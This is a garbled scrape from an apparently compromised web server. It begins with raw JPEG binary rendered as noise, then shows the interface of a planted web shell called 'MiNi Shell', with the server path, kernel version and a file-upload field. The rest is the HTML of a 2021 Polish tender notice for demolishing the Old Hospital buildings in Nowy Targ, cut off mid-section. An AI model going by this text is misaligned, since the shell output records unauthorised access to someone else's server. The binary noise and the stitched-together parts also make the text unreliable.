JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210512/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210512/0005257101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00052571 z dnia 2021-05-12</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbiórka budynków Starego Szpitala w Nowym Targu na potrzeby Podhalańskiej Państwowej Uczelni Zawodowej w Nowym Targu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Podhalańska Państwowa Uczelnia Zawodowa w Nowym Targu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 492722404</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kokoszków 71</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowy Targ</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">18 26 10 709</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">18 26 10 708</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampub@ppuz.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.malopolska.pl/ppwsz</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Uczelnia publiczna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbiórka budynków Starego Szpitala w Nowym Targu na potrzeby Podhalańskiej Państwowej Uczelni Zawodowej w Nowym Targu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-abd56f5c-b302-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00052571</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/ppwsz,m,317148,przetargi-i-zapytania.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Oferty oraz oświadczenie o którym mowa w art. 125 ust. 1 p.z.p: https://miniportal.uzp.gov.pl/Sposób komunikacji Zamawiającego z Wykonawcami (z wyłączeniem składania ofert oraz oświadczenia o którym mowa w art. 125 ust.1 ustawy p.z.p.):miniPortalu - https://miniportal.uzp.gov.pl/,ePUAPu - https://epuap.gov.pl/wps/portal, poczty elektronicznej: zampub@ppuz.edu.pl,</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt . Ofertę, a także oświadczenie o jakim mowa w Rozdziale XXVI ust. 1 pkt 1.2. SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KZP.382.02.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Rozbiórka budynków Starego Szpitala w Nowym Targu, oznaczonych w dokumentacji projektowej literami B, B1, C, D, E (budynek E składa się z dwóch części E1 i E2), zgodnie z warunkami decyzji Starosty Nowotarskiego nr 1340/19, znak: BA.6740.1.645.2019.EJ z dnia 12.11.2019 r. zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę, która obejmuje zakresem ww. zadanie oraz: dokumentacją projektową wraz z przedmiarem robót, opisem przedmiotu zamówienia, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, wzorem umowy, w szczególności :Wykonanie wszelkich prac przygotowawczych i zabezpieczających,(w tym dróg dojazdowych, przejazdów, ogrodzeń zabezpieczających teren budowy, rusztowań, tablic, oznakowania terenu budowy, itp.);Rozbiórkę budynku B - budynek przybudówki po stronie północno – zachodniej – budynek jednokondygnacyjny, podpiwniczony z lat 70 – tych ubiegłego wieku. Budynek posadowiony na ławach żelbetowych, oraz ścianach fundamentowych murowanych z cegły. Ściany w piwnicach wymurowano z cegły pełnej na zaprawie cementowo – wapiennej. Ściany nośne zewnętrzne oraz wewnętrzne o grubości od 25do 38 cm, murowane z cegły pełnej na zaprawie cementowo - wapiennej. Budynek nie posiada termoizolacji ścian zewnętrznych. Budynek na poziomie parteru jest wyniesiony nad teren o około 40 cm. Do wejścia głównego prowadzą schody terenowe betonowe. Stropy w formie płyt żelbetowych i gęstożebrowe. Schody – wewnętrzne pomiędzy parterem, a piwnicą stalowe kręcone oparte na centralnym słupie. Dach – wielospadowy, natomiast nad lukarną jednospadowy (pulpitowe). Konstrukcję dachu wykonano jako tradycyjną drewnianą. Pokrycie dachu wykonano z ocynkowanej blachy trapezowej układanej na pełnym deskowaniu. Rynny i rury - brak. Stolarka drzwiowa i okienna – całkowicie zdewastowana, niekompletna, z licznymi ubytkami. Posadzki – zdewastowane, niekompletne, z licznymi ubytkami;Rozbiórkę budynku B1 – jest to ruina kotłowni i szyb windowy położone po stronie północno wschodniej budynku. Ruiny kotłowni stanowią trzy ściany z cegły pełnej o grubości 25 cm. Obiekt całkowicie zdewastowany. Szyb windowy murowany z cegły pełnej o grubości 51 i 38 cm, wzmacniany żelbetowymi wieńcami miedzy kondygnacyjnymi. Cegła konstrukcyjna szybu na skutek wieloletniego zalewania uległa zwłaszcza na ścianie północnej istotnej degradacji, spękaniom i ubytkom. Przykrycie - dach pulpitowy o konstrukcji drewnianej kryty blachą trapezową ocynkowaną. Stan dachu dostateczny. Stan zarówno pozostałości kotłowni, jak również szybu windy bardzo zły;Rozbiórkę budynku C - budynek łącznika- dwukondygnacyjny, niepodpiwniczony. Łączybudynek A w poziomie półpiętra z parterem budynku E. Ściany zewnętrzne murowane z bloczków betonowych w obrębie parteru i bloczków gazobetonowych w obrębie pierwszej kondygnacji. Strop międzykondygnacyjny nad pierwszą i drugą kondygnacją, żelbetowy. Dach dwuspadowy na konstrukcji drewnianej kryty blachą płaską. Stolarka drzwiowa i okienna – całkowicie zdewastowana, niekompletna, z licznymi ubytkami;Rozbiórkę budynku D - budynek garażowo - gospodarczy. Budynek składający się z dwóch części: dwukondygnacyjnej przylegającej do łącznika i jednokondygnacyjnej położonej po stronie wschodniej. Budynek, niepodpiwniczony. Ściany zewnętrzne murowane w konstrukcji mieszanej z cegły pełnej i bloczków betonowych w obrębie parteru i bloczków gazobetonowych i cegły w obrębie	pierwszej kondygnacji. Strop miedzykondygnacyjny nad pierwszą kondygnacją, żelbetowy oparty na podciągach żelbetowych. Nad drugą kondygnacją z płyt żelbetowych. Nad częścią zachodnią brak dachu, który uległ spaleniu. Nad częścią wschodnią dach jednospadowy na kratownicach drewnianych kryty blachą płaską. Stolarka drzwiowa i okienna – całkowicie zdewastowana, lub jej brak, niekompletna, z licznymi ubytkami;Rozbiórkę budynku E - budynek w drugiej linii zabudowy – budynek trzykondygnacyjny + poddasze. Budynek składa się z dwóch części zachodniej starszej z przełomu lat 20 i 30 ubiegłego wieku oraz wschodniej z lat 70 ubiegłego wieku. Budynek podpiwniczony. W części zachodniej posadowiony na ławach z kamienia, miejscowo bezpośrednio na ścianach murowanych z cegły w części wschodniej na ławach żelbetowych. Ściany w piwnicach wymurowano z cegły pełnej na zaprawie wapiennej w części zachodniej i zaprawie cementowo – wapiennej w części wschodniej. W poziomie przyziemia ściana części zachodniej jest zdobiona detalem kamieniarskim (okładzina kamienna). Ściany nośne zewnętrzne oraz wewnętrzne o zmiennej grubości od 25 do 80 cm, zwężające się w większości schodkowo wraz z kolejną kondygnacją, murowane z cegły pełnej na zaprawie wapiennej. Budynek nie posiada termoizolacji ścian zewnętrznych. Budynek na poziomie parteru jest wyniesiony nad teren o około 80 cm. Do wejścia głównego prowadzą schody terenowe betonowe. Stropy nad piwnicą i parterem w części zachodniej odcinkowe na belkach stalowych, nad pozostałymi kondygnacjami drewniane. W części wschodniej stropy gęstożebrowe. Schody – wewnętrzne międzykondygnacyjne, dwubiegowe, żelbetowe wtórne z lat 70 tych. Stolarka drzwiowa i okienna (skrzynkowa) – całkowicie zdewastowana, niekompletna, z licznymi ubytkami. Dach – dwuspadowy. W części zachodniej dwa ryzality kryte dachami dwuspadowymi, w części wschodniej dwa dachy pulpitowe nad pomieszczeniami drugiego piętra. Konstrukcję dachu wykonano jako tradycyjną drewnianą, płatwiowo-kleszczową. Pokrycie dachu wykonano z blachy płaskiej układanej na pełnym deskowaniu. Rynny i rury spustowe uszkodzone z widocznymi ogniskami korozji, miejscowo brak. Na poddaszu stwierdzono brak folii paroizolacyjnej;W części zachodniej E1, rozbiórkę ścian zewnętrznych przeprowadzić do poziomu oblicowanej kamieniem podmurówki, rozbiórkę ścian wewnętrznych do poziomu ok. 30 cm poniżej poziomu gruntu. Wewnątrz obrysu ścian zewnętrznych zostanie utworzony plac ogólnodostępny reliktem budynku jako tzw. świadkiem. Część wschodnia E2 w pełni przeznaczona do rozbiórki.Wywóz i utylizację wszystkich materiałów z rozbiórki . Wszystkie materiały z rozbiórki bezwzględnie muszą być poddane utylizacji zgodnie z obowiązującymi przepisami prawa na co Wykonawca zobowiązany jest przedstawić zamawiającemu dokumenty potwierdzające utylizację;Zasypanie terenu po rozebranych budynkach wraz z wyplantowaniem ziemi – grunt do zasypów zapewnia Wykonawca; Zasyp należy wykonać gruntem gwarantującym uzyskanie wskaźnika zagęszczenia Is ≥ 0,95 . W celu potwierdzenia uzyskania wymaganego wskaźnika zagęszczenia Wykonawca na własny koszt wykona w obecności Inspektora Nadzoru badania sondą dynamiczną w 4 punktach wskazanych przez Inspektora Nadzoru.Opracowanie inwentaryzacji geodezyjnej powykonawczej, opatrzonej klauzulą przyjęcia do Państwowego Zasobu Geodezyjnego;10) Opracowanie dokumentacji powykonawczej, Wykonanie przez Wykonawcę wszelkich prac przygotowawczych, związanych z wymogami BHP, organizacją placu budowy;Uporządkowanie terenu budowy;Likwidacje placu budowy; Wykonanie wszelkich innych prac nieobjętych SWZ, a koniecznych do wykonania ze względu na obowiązujące przepisy i sztukę budowlaną. Roboty należy wykonać zgodnie z dokumentacją projektową, pozwoleniem na budowę z zachowaniem warunków wynikających z norm technicznych wykonania i odbioru robót budowlanych oraz zgodnie z zasadami wiedzy technicznej. Lokalizacja inwestycji: Nowy Targ dz. nr 5409/9, dz. nr 4525/1.Zamawiający wymaga od Wykonawcy udokumentowania sposobu zagospodarowania odpadów powstałych podczas realizacji zadania, jako warunek dokonania odbioru końcowego zadania.Zamawiający dopuszcza możliwość ograniczenia zakresu rzeczowego przedmiotu umowy, w sytuacji gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy lub jeżeli zaistnieją istotne zmiany okoliczności powodujące, że wykonanie części robót nie leży w interesie Zamawiającego. Roboty te będą nazywane robotami zaniechanymi. Maksymalna wartość robót zaniechanych nie przekroczy 10% wartości wynagrodzenia wykonawcy brutto. Zachowana minimalna wartość zamówienia wynosić będzie min. 90% wartości wynagrodzenia wykonawcy brutto.a/W przypadku rezygnacji z wykonywania części robót przewidzianych w dokumentacji projektowej („robót zaniechanych”) sposób obliczenia wartości tych robót, która będzie pomniejszać wartość wynagrodzenia Wykonawcy, będzie następujący:b /w przypadku odstąpienia od części robót obliczenie niewykonanej części nastąpi poprzez ustalenie, przez Zamawiającego i Wykonawcę, wartości tych robót budowlanych proporcjonalnie w oparciu o wartość zamówienia. Następnie zostanie odliczona wartość niewykonanych robót od ogólnej wartości przedmiotu umowy. W przypadku, gdy ten sposób wyliczenia byłby niemożliwy, dopuszcza się także możliwość obliczenia niewykonanej części danego elementu na podstawie kosztorysu przygotowanego przez Wykonawcę, w oparciu o ceny określone w wydawnictwie Sekocenbud dla kwartału, w którym była złożona oferta przetargowa Wykonawcy.Wymagany okres gwarancji na wykonany przedmiot umowy – minimum 36 miesięcy. Gwarancja stanowi jedno z kryteriów oceny ofert.Zamawiający wymaga posiadania przez Wykonawcę ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia – przy czym suma ubezpieczenia OC nie może być niższa niż 100 000,00 złotych (sto tysięcy złotych) na jedno i wszystkie zdarzenia, przez cały okres trwania umowy – dostarczenie dokumentów potwierdzających posiadanie polisy przed podpisaniem umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111100-9 - Roboty w zakresie burzenia</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">130 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin - skrócenie terminu realizacji zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu, w zakresie:Zdolności technicznej lub zawodowej.Zamawiający uzna, że wykonawca spełnia warunek w zakresie zdolności zawodowej, jeżeli:1) Wykonawca wykaże wykonanie (roboty budowlane zakończone) w okresie ostatnich 5 lat przed, upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w ilości, co najmniej:- 1 robotę budowlaną polegającej na rozbiórce budynku/budynków, o kubaturze nie mniejszej niż 2000 m3 o wartości min. 200 000,00 zł w ramach jednego zadania.Nie jest dopuszczalne sumowanie zadań/umów/zleceń o wartości lub kubaturze mniejszej, w celu wykazania warunków stawianych przez Zamawiającego.2) Wykonawca będzie dysponował osobą, która będzie uczestniczyć w wykonaniu zamówienia i która będzie odpowiedzialna za kierowanie robotami budowlanymi oraz będzie posiadać wymagane kwalifikacje zawodowe i wykształcenie, tj. posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (jt. Dz. U. z 2020 r., poz. 1333 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, upoważniające do kierowania robotami w zakresie objętym przedmiotowym zamówieniem.Wykonawca jest zobowiązany do ustanowienia na własny koszt kierownika budowy.W przypadku posługiwania się przez Wykonawców cudzym potencjałem Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te jako generalny wykonawca wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Oświadczenie składają wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, dotyczy także spółki cywilnej, gdzie oświadczenie składa każdy ze wspólników odrębnie, zgodnie z załącznikiem nr 7 do SWZ. Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz wykonanych robótW okresie ostatnich 5 lat przed, upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z załącznikiem nr 4 do SWZ wraz z dokumentami potwierdzającymi, że wykazana robota wykonana została w sposób należyty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedkładania przez Wykonawców przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 